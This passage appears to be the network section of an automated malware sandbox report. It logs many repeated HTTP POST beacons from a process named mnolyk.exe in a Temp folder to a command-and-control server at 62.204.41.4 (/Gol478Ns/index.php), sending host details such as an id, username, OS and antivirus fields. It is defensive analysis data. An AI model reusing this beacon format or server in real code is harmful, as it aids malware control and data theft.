                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.724581003 CET | 555 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        355 | 192.168.2.5 | 50045 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:23.896930933 CET | 556 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:23.960113049 CET | 556 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:23 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        356 | 192.168.2.5 | 50046 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:24.134243011 CET | 557 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.201291084 CET | 557 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        357 | 192.168.2.5 | 50047 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:24.370968103 CET | 558 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.436558008 CET | 558 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        358 | 192.168.2.5 | 50048 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:24.617449999 CET | 559 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.693803072 CET | 559 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        359 | 192.168.2.5 | 50049 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:24.878640890 CET | 560 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.941565990 CET | 560 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        36 | 192.168.2.5 | 49726 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:43.296876907 CET | 236 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:43.361358881 CET | 237 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        360 | 192.168.2.5 | 50050 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:25.142674923 CET | 561 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.208817005 CET | 561 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        361 | 192.168.2.5 | 50051 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:25.382181883 CET | 562 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.447067022 CET | 562 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        362 | 192.168.2.5 | 50052 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:25.625283957 CET | 563 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.689321041 CET | 563 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        363 | 192.168.2.5 | 50053 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:25.872782946 CET | 564 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.937591076 CET | 564 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        364 | 192.168.2.5 | 50054 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:26.116806030 CET | 565 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.183963060 CET | 565 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        365 | 192.168.2.5 | 50055 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:26.352552891 CET | 566 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.418876886 CET | 566 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        366 | 192.168.2.5 | 50056 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:26.630496025 CET | 567 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.694760084 CET | 567 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        367 | 192.168.2.5 | 50057 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:26.865833998 CET | 568 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.931377888 CET | 568 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        368 | 192.168.2.5 | 50058 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:27.099529982 CET | 569 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:27.164002895 CET | 569 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        369 | 192.168.2.5 | 50059 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:27.376297951 CET | 570 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:27.439764977 CET | 570 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        37 | 192.168.2.5 | 49727 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:43.531560898 CET | 237 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:43.601125956 CET | 238 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        370 | 192.168.2.5 | 50060 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:27.627657890 CET | 571 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:27.692301035 CET | 571 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        371 | 192.168.2.5 | 50061 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:27.966193914 CET | 572 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.031424046 CET | 572 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
